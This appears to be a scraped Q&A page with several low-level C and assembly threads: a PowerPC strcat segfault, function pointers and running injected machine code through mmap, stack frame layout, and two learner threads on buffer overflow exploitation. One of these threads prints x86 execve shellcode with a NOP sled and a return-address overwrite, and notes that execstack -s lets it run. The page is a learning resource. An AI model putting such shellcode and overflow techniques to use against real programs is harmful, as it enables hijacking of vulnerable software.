Assembly of Powerpc encountered Program received signal SIGSEGV Segmentation fault - c

When I try to store a value from a register to memory, I get a segmentation fault. Stepping through with gdb line by line, it reports "Program received signal SIGSEGV" when it reaches the stb instruction.
I am trying to implement the standard C strcat function in PowerPC assembly.
Here's the main C program, which is pretty simple.
#include<stdio.h>
extern char *mystrcat(char *first, char *second);
int main(){
char *first, *second, *third;
first = "ab";
second = "cd";
third = mystrcat(first, second);
printf("%s\n", third);
return 0;
}
And this is my mystrcat.s PowerPC assembly file.
.text
.align 2
.globl mystrcat
mystrcat:
mr %r5, %r3
.L1:
lbz %r6, 0(%r5)
cmpdi %r6, 0
beq .L2
addi %r5, %r5, 1
b .L1
.L2:
lbz %r6, 0(%r4)
stb %r6, 0(%r5)
addi %r4, %r4, 1
addi %r5, %r5, 1
cmpdi %r6, 0
beq .L3
b .L2
.L3:
blr
The code before the .L2 label finds the end of the first string.
gdb reported "Program received signal SIGSEGV" at the second line after the .L2 label.
The stb %r6, 0(%r5) instruction seems to raise the error.
But I don't understand why it cannot store to the address 0(%r5).
I've tried other instructions such as stbx and stbu, but none of them works.
Thank you to everyone who can give me even a little piece of advice.
Update:
I realized this has something to do with memory.
Since the memory holding the string is read-only, is there a way to allocate new memory inside the assembly code? I tried "bl malloc" followed by "nop", and the behavior is beyond my understanding.

In your main function, you try to concatenate two strings, but the destination has no room to hold the source appended at its end.
Adding a (kind of implicit) memory allocation to your mystrcat function would only introduce confusion.
Note that the segmentation fault also occurs with the standard strcat that you want to mimic.
You should fix your main function, writing something like this:
#include <stdio.h>
extern char *mystrcat(char *first, char *second);
int main(){
char first[8] = "ab";
char *second, *third;
second = "cd";
third = mystrcat(first, second);
printf("%s\n", third);
return 0;
}

String literals are typically stored in a read-only section of memory. Any attempt to modify a string literal results in undefined behavior.

Related

Why does my compiler (VS2017) choose 'CALL-JMP' to reach a subroutine instead of just 'CALL'?

C code:
#include <stdio.h>
int main(){
printf("hello word!\n");
return;
}
Assembly code:
push offset aHelloWord ; "hello word!\n"
call sub_41104B
add esp, 4
Now, I expect sub_41104B will lead directly to printf, but that's not the case:
sub_41104B proc near
jmp sub_411870
sub_41104B endp
And finally, in sub_411870, the printf function starts. Can someone explain why the compiler didn't just call sub_411870 directly?
"Now, I expect sub_41104B will lead directly to printf ..."
... or directly to puts().
"... but that's not the case"
Did you disassemble the object file or the final EXE file?
If you disassembled the EXE file, it is probable that the function you called is implemented in the LIB file as function "renaming" another one:
int puts(const char *text) // this is sub_41104B
{
return __x_puts(text); // __x_puts is sub_411870
}
You see this very often when calling a function in a DLL file. However, in the case of DLL files the jmp instruction is an indirect jump (jmp dword ptr [411870]), not a direct one.

Decode function pointer in C

Is it possible to store the contents a function pointer points to in C? I know you can store every kind of pointer in a variable. But if I can "unwrap" an integer pointer (to an integer) or a string pointer (to an unsigned char), wouldn't I be able to decode a function pointer as well?
To be clearer, I mean storing the machine code instructions in a variable.
You're missing an important fact: A function isn't a (first-class) object in C.
There are two basic types of pointers in C: Data pointers and function pointers. Both can be dereferenced using *.
The similarities end here. A data object has a stored value, so dereferencing a data pointer accesses this value:
int a = 5;
int *b = &a;
int c = *b; // 5
A function is just this, a function. You can call a function, so you can call the result of dereferencing a function pointer. It doesn't have a stored value:
int x(void) { return 1; }
int (*y)(void) = &x; // valid also without the address-of operator
// ...
int main(void)
{
int a = (*y)(); // valid also without explicit dereference like int a = y();
}
For ease of handling, C allows omitting the & operator when assigning a function to a function pointer and also omitting the explicit dereference when calling a function through a function pointer.
In short: using pointers doesn't change anything about the semantics of data objects vs functions.
Also note in this context that function and data pointers aren't compatible. You can't assign a function pointer to void *. It's even possible to have a platform where a function pointer has a different size from a data pointer.
In practice, on a platform where a function pointer has the same format as a data pointer, you could "convince" your compiler to access the actual binary code located there by casting your pointer to const char *. But be aware this is undefined behavior.
A pointer in C is the address of some object in memory. An int * is the address of an int, a pointer to a function is the address where the code of the function is stored in memory.
While you can read some bytes from the address of a function in memory, they are just bytes and nothing else. You need to know how to interpret these bytes in order to "store the machine code instructions in a variable". And the real problem here is to know where to stop, where the code of one function ends and the code of another function begins.
These things are not defined by the language and they depend on many factors: the processor architecture, the OS, the compiler, and the compiler flags used to compile the code (optimization flags, for example).
The real question here is: assuming you can "store the machine code instructions in a variable" how do you want to use it? It is just a sequence of bytes meaningless for most humans and it cannot be used to execute the function. If you are not writing a compiler, linker, emulator, operating system or something similar, there is nothing useful you can do with the machine code instruction of a function. (And if you are writing one of the above then you know the answer and you do not ask such questions on SO or somewhere else.)
Assume we are talking about a von Neumann architecture.
Basically we have a single memory that contains both instructions and data. However, modern OSes are able to control memory access permissions (read/write/execute).
As far as the standard is concerned, casting a function pointer to a data pointer is undefined behaviour. However, on, say, Linux with gcc and a modern x86-64 CPU, you can do such a conversion, and what you get is a pointer into a read-only executable segment of memory.
For instance take a look at this simple program:
#include <stdio.h>
int func() {
return 1;
}
int main() {
unsigned char * code = (void*)func;
printf("%02x\n%02x%02x%02x\n%02x%02x%02x%02x%02x\n%02x\n%02x\n",
*code,
*(code+1), *(code+2), *(code+3),
*(code+4), *(code+5), *(code+6), *(code+7), *(code+8),
*(code+9),
*(code+10));
}
Compiled with:
gcc -O0 -o tst tst.c
Its output on my machine is:
55 // push rbp
4889e5 // mov rbp, rsp
b801000000 // mov eax, 0x1
5d // pop rbp
c3 // ret
Which, as you can see, is indeed our function.
Since the OS lets you mark memory as executable, you can in fact write functions at runtime: all you need to do is generate opcodes for the current platform and mark the memory executable. This is exactly how JIT compilers work. For an excellent example of such a compiler, take a look at LuaJIT.
The code here is meant as a skeleton for injecting code into a program. But if you run it on an OS such as Linux or Windows, you will get an exception before the first instruction that fn_ptr points to is executed.
#include <stdio.h>
#include <malloc.h>
typedef int FN(void);
int main(void)
{
FN * fn_ptr;
char * x;
fn_ptr = malloc(10240);
x = (char *)fn_ptr;
// ... Insert code into x that points the same memory of fn_ptr;
x[0]='\xeb'; x[1]='\xfe'; // jmp $ that is like while(1)
fn_ptr();
return 0;
}
If you execute this code using gdb, you obtain this result:
(gdb) l
2 #include <malloc.h>
3
4 typedef int FN(void);
5
6 int main(void)
7 {
8 FN * fn_ptr;
9 char * x;
10
11 fn_ptr = malloc(10240);
12 x = (char *)fn_ptr;
13
14 // ... Insert code into x that points the same memory of fn_ptr;
15 x[0]='\xeb'; x[1]='\xfe'; // jmp $ that is like while(1)
16 fn_ptr();
17
18 return 0;
19 }
(gdb) b 11
Breakpoint 1 at 0x400535: file p.c, line 11.
(gdb) r
Starting program: /home/sergio/a.out
Breakpoint 1, main () at p.c:11
11 fn_ptr = malloc(10240);
(gdb) p fn_ptr
$1 = (FN *) 0x7fffffffde30
(gdb) n
12 x = (char *)fn_ptr;
(gdb) n
15 x[0]='\xeb'; x[1]='\xfe'; // jmp $ that is like while(1)
(gdb) p x[0]
$3 = 0 '\000'
(gdb) n
16 fn_ptr();
(gdb) p x[0]
$5 = -21 '\353'
(gdb) p x[1]
$6 = -2 '\376'
(gdb) s
Program received signal SIGSEGV, Segmentation fault.
0x0000000000602010 in ?? ()
(gdb) where
#0 0x0000000000602010 in ?? ()
#1 0x0000000000400563 in main () at p.c:16
(gdb)
As you can see, GDB signals a SIGSEGV (segmentation fault) at the address fn_ptr points to, although the bytes in that memory are valid instructions.
Note that the machine code EB FE is valid for Intel (or compatible) processors only. It corresponds to the assembly instruction jmp $.
This is an example of using function pointers where the machine code is copied into a memory area and executed.
The program below doesn't do anything special! It runs the code stored in the array prg[][] by copying it into a memory-mapped area. It uses two function pointers, fnI_ptr and fnD_ptr, both pointing to the same memory area. The program copies each of the two code sequences into that memory in turn and then executes the "loaded" code.
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <malloc.h>
#include <sys/mman.h>
#include <stdint.h>
#include <inttypes.h>
typedef int FNi(int,int);
typedef double FNd(double,double);
const unsigned char prg[][250] = { // unsigned: several opcode bytes exceed 0x7f
// int multiply(int x,int y)
{
0x55, // push %rbp
0x48,0x89,0xe5, // mov %rsp,%rbp
0x89,0x7d,0xfc, // mov %edi,-0x4(%rbp)
0x89,0x75,0xf8, // mov %esi,-0x8(%rbp)
0x8B,0x45,0xfc, // mov -0x4(%rbp),%eax
0x0f,0xaf,0x45,0xf8, // imul -0x8(%rbp),%eax
0x5d, // pop %rbp
0xc3 // retq
},
// double multiply(double x,double y)
{
0x55, // push %rbp
0x48,0x89,0xe5, // mov %rsp,%rbp
0xf2,0x0f,0x11,0x45,0xf8, // movsd %xmm0,-0x8(%rbp)
0xf2,0x0f,0x11,0x4d,0xf0, // movsd %xmm1,-0x10(%rbp)
0xf2,0x0f,0x10,0x45,0xf8, // movsd -0x8(%rbp),%xmm0
0xf2,0x0f,0x59,0x45,0xf0, // mulsd -0x10(%rbp),%xmm0
0xf2,0x0f,0x11,0x45,0xe8, // movsd %xmm0,-0x18(%rbp)
0x48,0x8b,0x45,0xe8, // mov -0x18(%rbp),%rax
0x48,0x89,0x45,0xe8, // mov %rax,-0x18(%rbp)
0xf2,0x0f,0x10,0x45,0xe8, // movsd -0x18(%rbp),%xmm0
0x5d, // pop %rbp
0xc3 // retq
}
};
int main(void)
{
#define FMT "0x%016"PRIX64
int ret=0;
FNi * fnI_ptr=NULL;
FNd * fnD_ptr=NULL;
void * x=NULL;
//uint64_t p = PAGE(K), l = p*4; //Max memory to use!
uint64_t p = 0, l = 0, line=0; //Max memory to use!
do {
p = getpagesize();line = __LINE__;
if (!p) {
ret=line;
break;
}
l=p*2;
printf("Mem page size = "FMT"\n",p);
printf("Mem alloc size = "FMT"\n\n",l);
x = mmap(NULL, l, PROT_EXEC | PROT_READ | PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0);line = __LINE__;
if (x==MAP_FAILED) {
x=NULL;
ret=line;
break;
}
//Prepares function-pointers. They point the same memory! :)
fnI_ptr=(FNi *)x;
fnD_ptr=(FNd *)x;
printf("from x="FMT" to "FMT"\n\n",(int64_t)x,(int64_t)x + l);
// Calling the functions coded into the array prg
puts("Copying prg[0]");
// It injects the function prg[0]
memcpy(x,prg[0],sizeof(prg[0]));
// It executes the injected code
printf("executing int-mul = %d\n",fnI_ptr(10,20));
puts("--------------------------");
puts("Copying prg[1]");
// It injects the function prg[1]
memcpy(x,prg[1],sizeof(prg[1]));
//Prepares function pointers.
// It executes the injected code
printf("executing dbl-mul = %f\n\n",fnD_ptr(12.3,3.21));
} while(0); // Fake loop to be breaked when an error occurs!
if (x!=NULL)
munmap(x,l);
if (ret) {
printf("[line"
"=%d] Error %d - %s\n",ret,errno,strerror(errno));
}
return errno;
}
prg[][] contains two machine-code functions:
The first multiplies two integer values and returns an integer result.
The second multiplies two double-precision values and returns a double-precision result.
I won't discuss portability here. The code in prg[][] was obtained with objdump -S prgname > prgname.s from an object file produced by compiling the following code with gcc ( gcc (Ubuntu 4.8.4-2ubuntu1~14.04.3) 4.8.4 ) without optimization:
int multiply(int a, int b)
{
return a*b;
}
double dMultiply(double a, double b)
{
return a*b;
}
The above code was compiled on a PC with an Intel i3 CPU (64-bit) running Linux (3.13.0-116-generic #163-Ubuntu SMP Fri Mar 31 14:13:22 UTC 2017 x86_64).

Buffer Overflow won't work get Seg Fault

I am trying to get a buffer overflow to work. I have the following simple vulnerable program:
int main(int argc, char** argv) {
char buffer[80];
strcpy(buffer,argv[1]);
return 1;
}
With the following program I want to get a shell via a buffer overflow.
char shellcode[]=
"\x31\xc0"
"\x50"
"\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69"
"\x89\xe3"
"\x99"
"\x52"
"\x53"
"\x89\xe1"
"\xb0\x0b"
"\xcd\x80";
char retaddr[] = "\xa8\xd5\xff\xff";
#define NOP 0x90
int main() {
char buffer[96];
memset(buffer, NOP, 96);
memcpy(buffer, "EGG=",4);
memcpy(buffer+4,shellcode,24);
memcpy(buffer+88,retaddr,4);
memcpy(buffer+92, "\x00\x00\x00\x00",4);
putenv(buffer);
printf("%p\n", buffer);
system("/bin/sh");
return 0;
}
This program creates a buffer with the shellcode at the beginning. After the shellcode come some NOP instructions and then the value that overwrites the return address and points to the beginning of the shellcode. It then creates an environment variable from the buffer and starts a shell.
If I run that program, the shell starts and the environment variable is set. But if I run the vulnerable program with the environment variable as its parameter, I get a segmentation fault.
Here are some screenshots from gdb:
I don't have enough reputation to post images directly, so here is the link to an imgur album with the 4 pictures in it.
The first picture shows the stack before the strcpy happens.
The second one shows argv[1].
The third picture shows the stack after the strcpy.
As you can see, 0xf7e00497 is the return address. If I disassemble at this address, the code of the libc function is shown.
In the third picture you can see that this address is overwritten by the address 0xffffd5a8, which points to the top of the stack.
In picture number 4 you can see the segmentation fault that occurs when the program continues to run.
Can anybody tell me why? Everything seems to be okay.
I compiled both programs with gcc's -fno-stack-protector option.
Thanks @type1232, the issue was that the stack is not executable.
With execstack -s vulProg, the shellcode will run.

Can't exploit stack overflow

I'm learning about buffer overflows, and I have a problem exploiting a stack-based buffer overflow.
Here is my program:
#include <stdio.h>
void func(){
printf("asd");
}
main(){
char buf[10];
scanf("%s", &buf);
}
I'm overwriting the first 14 bytes with A's (the buffer and the old EIP address). My goal is to execute the func function, or to change the EIP to its address. But I always get an illegal instruction. I have checked the hex address of the function; I have written the bytes in reverse order and they are correct.
You will have to look at the compiled code in assembler; e.g.
your main() may look like:
char buf[10];
scanf("%s", &buf);
00D7B938 mov esi,esp
00D7B93A lea eax,[ebp-14h]
00D7B93D push eax
00D7B93E push offset string "%s" (0D818D4h)
00D7B943 call dword ptr [__imp__scanf (0D89684h)]
You'll have to debug to see what is actually on the stack at this point; e.g. if you are compiling a debug build, it is highly likely there's a lot more on the stack than you may think!

What does the stack frame look like in my function?

I am a beginner at assembly, and I am curious to know what the stack frame looks like here, so that I can access the argument by understanding rather than by following a recipe.
P.S.: the assembly function is process.
#include <stdio.h>
# define MAX_LEN 120 // Maximal line size
extern int process(char*);
int main(void) {
char buf[MAX_LEN];
int str_len = 0;
printf("Enter a string:");
fgets(buf, MAX_LEN, stdin);
str_len = process(buf);
So, I know that when I want to access the process function's argument, which is in assembly, I have to do the following:
push ebp
mov ebp, esp ; now ebp is pointing to the same address as esp
pushad
mov ebx, dword [ebp+8]
Now I also would like someone to correct me on things I think are correct:
At the start, esp is pointing to the return address of the function, and [esp+8] is the slot in the stack under it, which is the function's argument
Since the function process has one argument and no inner declarations (not sure about the declarations) then the stack frame, from high to low, is 8 bytes for the argument, 8 bytes for the return address.
Thank you.
There's no way to tell other than by means of debugger. You are using ia32 conventions (ebp, esp) instead of x64 (rbp, rsp), but expecting int / addresses to be 64 bit. It's possible, but not likely.
Compile the program (gcc -O -g foo.c), then run with gdb a.out
#include <stdio.h>
int process(char* a) { printf("%p", (void*)a); return 0; }
int main()
{
process((char *)0xabcd1234);
}
Break at process; run; disassemble; inspect registers values and dump the stack.
- break process
- run
- disassemble
- info frame
- info args
- info registers
- x/32x $sp - 16 // dump 32 words of the stack, starting 16 bytes below the stack pointer
Then add more parameters, a second subroutine or local variables with known values. Single step to the printf routine. What does the stack look like there?
You can also use gdb as a calculator: what is the difference between sp and rax?
It's print $sp - $rax, if you ever want to know.
Tickle your compiler into producing assembler output (on Unixy systems usually with the -S flag). Play around with debugging/non-debugging flags; the extra hints for the debugger might help in referring back to the source. Don't give optimization flags; the reorganizing done by the compiler can lead to thorough confusion. Add a simple function call to your code to see how it is set up and torn down, too.

Resources